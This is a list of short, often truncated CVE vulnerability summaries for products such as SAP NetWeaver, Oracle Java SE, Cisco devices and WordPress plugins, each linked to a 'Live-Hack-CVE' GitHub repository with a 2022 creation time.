**SAP NetWeaver AS ABAP (Workplace Server) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 787, allows an attacker to execute crafted database queries, that could expose the backend database. Successful attacks could result in disclosure of a table of contents from the system, but no risk of modifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22540](https://github.com/Live-Hack-CVE/CVE-2022-22540) create time: 2022-12-29T09:51:49Z

**An attacker with no prior authentication could craft and send malicious script to SAP GUI for HTML within Fiori Launchpad, resulting in reflected cross-site scripting attack. This could lead to stealing session information and impersonating the affected user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39799](https://github.com/Live-Hack-CVE/CVE-2022-39799) create time: 2022-12-29T09:51:46Z

**An attacker with basic business user privileges could craft and upload a malicious file to SAP NetWeaver Application Server ABAP, which is then downloaded and viewed by other users resulting in a stored Cross-Site-Scripting attack. This could lead to information disclosure including stealing authentication information CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35294](https://github.com/Live-Hack-CVE/CVE-2022-35294) create time: 2022-12-29T09:51:42Z

**Under certain conditions, an attacker could create an unintended sphere of control through a vulnerability present in file delete operation in Autodesk desktop app (ADA). An attacker could leverage this vulnerability to escalate privileges and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33882](https://github.com/Live-Hack-CVE/CVE-2022-33882) create time: 2022-12-29T09:51:39Z

**Arbitrary file upload vulnerability in php uploader CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40721](https://github.com/Live-Hack-CVE/CVE-2022-40721) create time: 2022-12-29T09:51:29Z

**An issue was discovered in Veritas NetBackup through 10.0 and related Veritas products. The NetBackup Primary server is vulnerable to a SQL Injection attack affecting the NBFSMCLIENT service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42302](https://github.com/Live-Hack-CVE/CVE-2022-42302) create time: 2022-12-29T09:51:12Z

**Certain HP Print Products are potentially vulnerable to Buffer Overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28722](https://github.com/Live-Hack-CVE/CVE-2022-28722) create time: 2022-12-29T09:51:08Z

**The AMS module has a vulnerability in input validation. Successful exploitation of this vulnerability may cause privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31762](https://github.com/Live-Hack-CVE/CVE-2022-31762) create time: 2022-12-29T09:51:01Z

**The communication module has a vulnerability of improper permission preservation. Successful exploitation of this vulnerability may affect system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31755](https://github.com/Live-Hack-CVE/CVE-2022-31755) create time: 2022-12-29T09:50:38Z

**.NET and Visual Studio Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30184](https://github.com/Live-Hack-CVE/CVE-2022-30184) create time: 2022-12-29T09:50:34Z

**Windows Kerberos Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30165](https://github.com/Live-Hack-CVE/CVE-2022-30165) create time: 2022-12-29T09:50:31Z

**The Site Offline or Coming Soon WordPress plugin through 1.6.6 does not have CSRF check in place when updating its settings, and it also lacking sanitisation as well as escaping in some of them. As a result, attackers could make a logged in admin change them and put Cross-Site Scripting payloads in them via a CSRF atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1593](https://github.com/Live-Hack-CVE/CVE-2022-1593) create time: 2022-12-29T09:50:27Z

**A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23712](https://github.com/Live-Hack-CVE/CVE-2022-23712) create time: 2022-12-29T09:50:24Z

**Due to improper error handling an authenticated user can crash CLA assistant instance. This could impact the availability of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29617](https://github.com/Live-Hack-CVE/CVE-2022-29617) create time: 2022-12-29T09:50:20Z

**A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. A malicious website may be able to track users in Safari private browsing mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26731](https://github.com/Live-Hack-CVE/CVE-2022-26731) create time: 2022-12-29T09:50:17Z

**A use after free in the Linux kernel File System notify functionality was found in the way user triggers copy_info_records_to_user() call to fail in copy_event_to_user(). A local user could use this flaw to crash the system or potentially escalate their privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1998](https://github.com/Live-Hack-CVE/CVE-2022-1998) create time: 2022-12-29T09:50:13Z

**The kernel emcom module has multi-thread contention. Successful exploitation of this vulnerability may affect system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31751](https://github.com/Live-Hack-CVE/CVE-2022-31751) create time: 2022-12-29T09:50:10Z

**The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0788](https://github.com/Live-Hack-CVE/CVE-2022-0788) create time: 2022-12-29T09:50:06Z

**Dell Hybrid Client below 1.8 version contains a Zip Slip Vulnerability in UI. A guest privilege attacker could potentially exploit this vulnerability, leading to system files modification. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34429](https://github.com/Live-Hack-CVE/CVE-2022-34429) create time: 2022-12-29T09:49:52Z

**Dell Hybrid Client prior to version 1.8 contains a Regular Expression Denial of Service Vulnerability in the UI. An adversary with WMS group admin access could potentially exploit this vulnerability, leading to temporary denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34428](https://github.com/Live-Hack-CVE/CVE-2022-34428) create time: 2022-12-29T09:49:49Z

**Discourse is an open source discussion platform. Starting with version 2.9.0.beta5 and prior to version 2.9.0.beta10, an incomplete quote can generate a JavaScript error which will crash the current page in the browser in some cases. Version 2.9.0.beta10 added a fix and tests to ensure incomplete quotes won't break the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39232](https://github.com/Live-Hack-CVE/CVE-2022-39232) create time: 2022-12-29T09:49:35Z

**A vulnerability in the LIEF::MachO::SegmentCommand::virtual_address function of LIEF v0.12.1 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted MachO file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40923](https://github.com/Live-Hack-CVE/CVE-2022-40923) create time: 2022-12-29T09:49:21Z

**If folder security is misconfigured for Actian Zen PSQL BEFORE Patch Update 1 for Zen 15 SP1 (v15.11.005), Patch Update 4 for Zen 15 (v15.01.017), or Patch Update 5 for Zen 14 SP2 (v14.21.022), it can allow an attacker (with file read/write access) to remove specific security files in order to reset the master password CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40756](https://github.com/Live-Hack-CVE/CVE-2022-40756) create time: 2022-12-29T09:49:18Z

**mojoPortal v2.7 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted PNG file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40341](https://github.com/Live-Hack-CVE/CVE-2022-40341) create time: 2022-12-29T09:49:14Z

**Bus Pass Management System 1.0 was discovered to contain a SQL Injection vulnerability via the searchdata parameter at /buspassms/download-pass.php.. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35156](https://github.com/Live-Hack-CVE/CVE-2022-35156) create time: 2022-12-29T09:49:11Z

**Bus Pass Management System v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the searchdata parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35155](https://github.com/Live-Hack-CVE/CVE-2022-35155) create time: 2022-12-29T09:49:08Z

**A vulnerability in the 802.11 association frame validation of Cisco Catalyst 9100 Series Access Points (APs) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation of certain parameters within assoc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20945](https://github.com/Live-Hack-CVE/CVE-2022-20945) create time: 2022-12-29T09:49:01Z

**Microsoft Excel Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-29109. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29110](https://github.com/Live-Hack-CVE/CVE-2022-29110) create time: 2022-12-29T09:48:57Z

**A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to overwrite and possibly corrupt files on an affected system. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by injecting arbitrary commands that are executed as th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20930](https://github.com/Live-Hack-CVE/CVE-2022-20930) create time: 2022-12-29T09:48:31Z

**A vulnerability in the CLI of stand-alone Cisco IOS XE SD-WAN Software and Cisco SD-WAN Software could allow an authenticated, local attacker to delete arbitrary files from the file system of an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20850](https://github.com/Live-Hack-CVE/CVE-2022-20850) create time: 2022-12-29T09:48:14Z

**A buffer over-read vulnerability exists in Wibu-Systems CodeMeter versions < 7.21a. An unauthenticated remote attacker can exploit this issue to disclose heap memory contents or crash the CodeMeter Runtime Server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20093](https://github.com/Live-Hack-CVE/CVE-2021-20093) create time: 2022-12-29T09:04:53Z

**Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-4341](https://github.com/Live-Hack-CVE/CVE-2012-4341) create time: 2022-12-29T09:08:53Z

**Business Warehouse (BW) in SAP Netweaver AS ABAP 7.31 allows remote authenticated users to obtain sensitive information via a request to the RSDU_CCMS_GET_PROFILE_PARAM RFC function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-8312](https://github.com/Live-Hack-CVE/CVE-2014-8312) create time: 2022-12-29T09:08:30Z

**XML external entity vulnerability in the Extended Computer Aided Test Tool (eCATT) in SAP NetWeaver AS ABAP 7.31 and earlier allows remote attackers to access arbitrary files via a crafted XML request, related to ECATT_DISPLAY_XMLSTRING_REMOTE, aka SAP Note 2016638. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1309](https://github.com/Live-Hack-CVE/CVE-2015-1309) create time: 2022-12-29T09:08:57Z

**Cross-site scripting (XSS) vulnerability in Rexroth Bosch BLADEcontrol-WebVIS 3.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4508](https://github.com/Live-Hack-CVE/CVE-2016-4508) create time: 2022-12-29T08:28:26Z

**SQL injection vulnerability in Rexroth Bosch BLADEcontrol-WebVIS 3.0.2 and earlier allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4507](https://github.com/Live-Hack-CVE/CVE-2016-4507) create time: 2022-12-29T08:27:07Z

**The bufRead::get() function in libzpaq/libzpaq.h in liblrzip.so in lrzip 0.631 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8842](https://github.com/Live-Hack-CVE/CVE-2017-8842) create time: 2022-12-29T09:09:32Z

**SAP NetWeaver AS ABAP 7.40 allows remote authenticated users with certain privileges to cause a denial of service (process crash) via vectors involving disp+work.exe, aka SAP Security Note 2406841. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9843](https://github.com/Live-Hack-CVE/CVE-2017-9843) create time: 2022-12-29T09:08:26Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: MyISAM). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Server execut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3313](https://github.com/Live-Hack-CVE/CVE-2017-3313) create time: 2022-12-29T09:07:48Z

**Nextcloud Server before 9.0.55 and 10.0.2 suffers from a Content-Spoofing vulnerability in the "files" app. The top navigation bar displayed in the files list contained partially user-controllable input leading to a potential misrepresentation of information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-0888](https://github.com/Live-Hack-CVE/CVE-2017-0888) create time: 2022-12-29T09:01:19Z

**A memory leak was found in the way SIPcrack 0.2 handled processing of SIP traffic, because a lines array was mismanaged. A remote attacker could potentially use this flaw to crash long-running sipdump network sniffing sessions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-11655](https://github.com/Live-Hack-CVE/CVE-2017-11655) create time: 2022-12-29T08:28:41Z

**An out-of-bounds read and write flaw was found in the way SIPcrack 0.2 processed SIP traffic, because 0x00 termination of a payload array was mishandled. A remote attacker could potentially use this flaw to crash the sipdump process by generating specially crafted SIP traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-11654](https://github.com/Live-Hack-CVE/CVE-2017-11654) create time: 2022-12-29T08:28:38Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10388](https://github.com/Live-Hack-CVE/CVE-2017-10388) create time: 2022-12-29T08:28:13Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10357](https://github.com/Live-Hack-CVE/CVE-2017-10357) create time: 2022-12-29T08:28:09Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infras CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10356](https://github.com/Live-Hack-CVE/CVE-2017-10356) create time: 2022-12-29T08:28:05Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access vi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10355](https://github.com/Live-Hack-CVE/CVE-2017-10355) create time: 2022-12-29T08:28:02Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10350](https://github.com/Live-Hack-CVE/CVE-2017-10350) create time: 2022-12-29T08:27:58Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10243](https://github.com/Live-Hack-CVE/CVE-2017-10243) create time: 2022-12-29T08:27:48Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10285](https://github.com/Live-Hack-CVE/CVE-2017-10285) create time: 2022-12-29T08:27:45Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10281](https://github.com/Live-Hack-CVE/CVE-2017-10281) create time: 2022-12-29T08:27:21Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10349](https://github.com/Live-Hack-CVE/CVE-2017-10349) create time: 2022-12-29T08:27:18Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10295](https://github.com/Live-Hack-CVE/CVE-2017-10295) create time: 2022-12-29T08:27:14Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10348](https://github.com/Live-Hack-CVE/CVE-2017-10348) create time: 2022-12-29T08:27:11Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Difficult to exploit vulnerability allows unauthenticated attacker with network access via m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10198](https://github.com/Live-Hack-CVE/CVE-2017-10198) create time: 2022-12-29T08:27:04Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10176](https://github.com/Live-Hack-CVE/CVE-2017-10176) create time: 2022-12-29T08:27:00Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to comprom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10193](https://github.com/Live-Hack-CVE/CVE-2017-10193) create time: 2022-12-29T08:26:56Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JCE). Supported versions that are affected are Java SE: 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protoc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10118](https://github.com/Live-Hack-CVE/CVE-2017-10118) create time: 2022-12-29T08:26:53Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JCE). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multip CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10135](https://github.com/Live-Hack-CVE/CVE-2017-10135) create time: 2022-12-29T08:26:49Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JCE). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10115](https://github.com/Live-Hack-CVE/CVE-2017-10115) create time: 2022-12-29T08:26:46Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Difficult to exploit vulnerability allows unauthenticated attacker with network access via m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10116](https://github.com/Live-Hack-CVE/CVE-2017-10116) create time: 2022-12-29T08:26:42Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). The supported version that is affected is Java SE: 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10111](https://github.com/Live-Hack-CVE/CVE-2017-10111) create time: 2022-12-29T08:26:39Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access vi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10109](https://github.com/Live-Hack-CVE/CVE-2017-10109) create time: 2022-12-29T08:26:35Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Ja CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10101](https://github.com/Live-Hack-CVE/CVE-2017-10101) create time: 2022-12-29T08:26:32Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Jav CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10107](https://github.com/Live-Hack-CVE/CVE-2017-10107) create time: 2022-12-29T08:26:28Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access vi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10108](https://github.com/Live-Hack-CVE/CVE-2017-10108) create time: 2022-12-29T08:26:25Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise J CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10102](https://github.com/Live-Hack-CVE/CVE-2017-10102) create time: 2022-12-29T08:26:21Z

**In Long Range Zip (aka lrzip) 0.631, there is a use-after-free in read_stream in stream.c, because decompress_file in lrzip.c lacks certain size validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11496](https://github.com/Live-Hack-CVE/CVE-2018-11496) create time: 2022-12-29T09:09:36Z

**In Long Range Zip (aka lrzip) 0.631, there is a use-after-free in the ucompthread function (stream.c). Remote attackers could leverage this vulnerability to cause a denial of service via a crafted lrz file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-5747](https://github.com/Live-Hack-CVE/CVE-2018-5747) create time: 2022-12-29T09:09:29Z

**A denial of service vulnerability was found in rsyslog in the imptcp module. An attacker could send a specially crafted message to the imptcp socket, which would cause rsyslog to crash. Versions before 8.27.0 are vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16881](https://github.com/Live-Hack-CVE/CVE-2018-16881) create time: 2022-12-29T09:06:19Z

**A vulnerability has been identified in OpenPCS 7 V7.1 and earlier (All versions), OpenPCS 7 V8.0 (All versions), OpenPCS 7 V8.1 (All versions < V8.1 Upd5), OpenPCS 7 V8.2 (All versions), OpenPCS 7 V9.0 (All versions < V9.0 Upd1), SIMATIC BATCH V7.1 and earlier (All versions), SIMATIC BATCH V8.0 (All versions < V8.0 SP1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-4832](https://github.com/Live-Hack-CVE/CVE-2018-4832) create time: 2022-12-29T09:06:12Z

**ADMesh through 0.98.4 has a heap-based buffer over-read in stl_update_connects_remove_1 (called from stl_remove_degenerate) in connect.c in libadmesh.a. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25033](https://github.com/Live-Hack-CVE/CVE-2018-25033) create time: 2022-12-29T09:04:47Z

**In Smarty before 3.1.47 and 4.x before 4.2.1, libs/plugins/function.mailto.php allows XSS. A web page that uses smarty_function_mailto, and that could be parameterized using GET or POST input parameters, could allow injection of JavaScript code by a user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25047](https://github.com/Live-Hack-CVE/CVE-2018-25047) create time: 2022-12-29T09:01:22Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Windows DLL). Supported versions that are affected are Java SE: 7u181 and 8u172. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2942](https://github.com/Live-Hack-CVE/CVE-2018-2942) create time: 2022-12-29T08:28:34Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171; JRockit: R28.3.18. Difficult to exploit vulnerability allows unauthenticated attacker with network a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2952](https://github.com/Live-Hack-CVE/CVE-2018-2952) create time: 2022-12-29T08:28:30Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u161 and 8u152; Java SE Embedded: 8u152; JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with network access via m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2783](https://github.com/Live-Hack-CVE/CVE-2018-2783) create time: 2022-12-29T08:28:23Z

**Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2799](https://github.com/Live-Hack-CVE/CVE-2018-2799) create time: 2022-12-29T08:28:20Z

**Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u191, 7u181, 8u172 and 10.0.1; Java SE Embedded: 8u171. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2940](https://github.com/Live-Hack-CVE/CVE-2018-2940) create time: 2022-12-29T08:28:16Z

**Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13720](https://github.com/Live-Hack-CVE/CVE-2019-13720) create time: 2022-12-29T09:10:52Z

**A vulnerability has been identified in SIMATIC CP 443-1 OPC UA (All versions), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V2.7), SIMATIC HMI Comfort Outdoor Panels 7" & 15" (incl. SIPLUS variants) (All versions < V15.1 Upd 4), SIMATIC HMI Comfort Panels 4" - 22" (incl. SIPLU CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6575](https://github.com/Live-Hack-CVE/CVE-2019-6575) create time: 2022-12-29T09:06:05Z

**HTCondor up to and including stable series 8.8.6 and development series 8.9.4 has Incorrect Access Control. It is possible to use a different authentication method to submit a job than the administrator has specified. If the administrator has configured the READ or WRITE methods to include CLAIMTOBE, then it is possibl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18823](https://github.com/Live-Hack-CVE/CVE-2019-18823) create time: 2022-12-29T09:04:50Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u201, 8u192 and 11.0.1; Java SE Embedded: 8u191. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Suc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2422](https://github.com/Live-Hack-CVE/CVE-2019-2422) create time: 2022-12-29T09:04:43Z

